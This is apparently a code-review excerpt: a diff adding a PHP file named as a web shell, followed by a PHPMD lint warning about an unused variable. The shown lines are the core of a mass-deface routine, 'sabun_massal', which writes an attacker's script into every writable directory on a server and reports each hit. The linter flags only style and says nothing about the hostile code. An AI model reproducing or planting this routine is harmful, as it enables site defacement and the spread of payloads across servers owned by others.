013_shell_L789.php

```
@@ -0,0 +1,1800 @@
+				$dirc = "$dir/$dirb";
+				$lokasi = $dirc.'/'.$namafile;
+				if($dirb === '.') {
+					file_put_contents($lokasi, $isi_script);
+				} elseif($dirb === '..') {
+					file_put_contents($lokasi, $isi_script);
+				} else {
+					if(is_dir($dirc)) {
+						if(is_writable($dirc)) {
+							echo "<font size=2 color=lime>DONE</font><font size=2> $lokasi<br></font>";
+							file_put_contents($lokasi, $isi_script);
+							$idx = sabun_massal($dirc,$namafile,$isi_script);
```

PHPMD (2.15.0)

Avoid unused local variables such as '$idx'. (undefined)

(UnusedLocalVariable)